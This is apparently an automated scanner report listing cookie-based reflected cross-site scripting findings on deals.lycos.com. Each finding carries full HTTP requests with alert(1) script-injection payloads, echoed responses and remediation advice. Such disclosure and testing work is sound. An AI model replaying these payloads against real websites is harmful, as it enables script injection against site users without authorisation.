Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:54 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47539
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92d65"%3balert(1)//18a8cd271fa was submitted in the diktfc cookie. This input was echoed as 92d65";alert(1)//18a8cd271fa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deals/category/pets-221 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A92d65"%3balert(1)//18a8cd271fa; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:32 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:32 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 28411
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89742"><script>alert(1)</script>b872a3a4dcc was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deals/category/pets-221 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A89742"><script>alert(1)</script>b872a3a4dcc; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:30 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:30 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 28361

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deals/category/pets-221&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A89742"><script>alert(1)</script>b872a3a4dcc&cj=1" alt="tracker" />
...[SNIP]...
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72d28"><script>alert(1)</script>cbdacb961cb was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deals/category/sports-and-fitness-211 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A72d28"><script>alert(1)</script>cbdacb961cb; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:40 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:40 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46511

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deals/category/sports-and-fitness-211&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A72d28"><script>alert(1)</script>cbdacb961cb&cj=1" alt="tracker" />
...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3b12d"%3balert(1)//42efa8c45f1 was submitted in the diktfc cookie. This input was echoed as 3b12d";alert(1)//42efa8c45f1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deals/category/sports-and-fitness-211 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3b12d"%3balert(1)//42efa8c45f1; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:42 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:42 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46480
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd261"><script>alert(1)</script>061e5deae73 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deals/category/televisions-159 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Afd261"><script>alert(1)</script>061e5deae73; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:50 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:51 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47998

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deals/category/televisions-159&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Afd261"><script>alert(1)</script>061e5deae73&cj=1" alt="tracker" />
...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d1fcd"%3balert(1)//17153ed5472 was submitted in the diktfc cookie. This input was echoed as d1fcd";alert(1)//17153ed5472 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deals/category/televisions-159 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ad1fcd"%3balert(1)//17153ed5472; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:52 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:52 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 48716
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98c1d"><script>alert(1)</script>7cb04211ed3 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deals/category/travel-and-entertainment-206 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A98c1d"><script>alert(1)</script>7cb04211ed3; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:43 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:43 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 45931
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deals/category/travel-and-entertainment-206&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A98c1d"><script>alert(1)</script>7cb04211ed3&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 68ab0"%3balert(1)//e4a4a2514b6 was submitted in the diktfc cookie. This input was echoed as 68ab0";alert(1)//e4a4a2514b6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deals/category/travel-and-entertainment-206 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A68ab0"%3balert(1)//e4a4a2514b6; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:45 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:45 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 45908
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5bc0"><script>alert(1)</script>c7e153dfa56 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deals/stores HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac5bc0"><script>alert(1)</script>c7e153dfa56; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:14 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:14 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31882
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deals/stores&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac5bc0"><script>alert(1)</script>c7e153dfa56&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b302d"%3balert(1)//2f566655819 was submitted in the diktfc cookie. This input was echoed as b302d";alert(1)//2f566655819 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deals/stores HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab302d"%3balert(1)//2f566655819; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:15 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:15 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31852
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7962"><script>alert(1)</script>516615919cc was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deals/stores/6pm-1460 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab7962"><script>alert(1)</script>516615919cc; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:15 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:15 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25281
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deals/stores/6pm-1460&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab7962"><script>alert(1)</script>516615919cc&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f5859"%3balert(1)//b6205f25b94 was submitted in the diktfc cookie. This input was echoed as f5859";alert(1)//b6205f25b94 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deals/stores/6pm-1460 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Af5859"%3balert(1)//b6205f25b94; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:16 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:16 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25198
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd064"><script>alert(1)</script>f8d80f801a2 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deals/stores/best-buy-560 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Afd064"><script>alert(1)</script>f8d80f801a2; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:36 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:36 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47006
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deals/stores/best-buy-560&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Afd064"><script>alert(1)</script>f8d80f801a2&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3978b"%3balert(1)//cc36d6b749a was submitted in the diktfc cookie. This input was echoed as 3978b";alert(1)//cc36d6b749a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deals/stores/best-buy-560 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3978b"%3balert(1)//cc36d6b749a; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:38 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
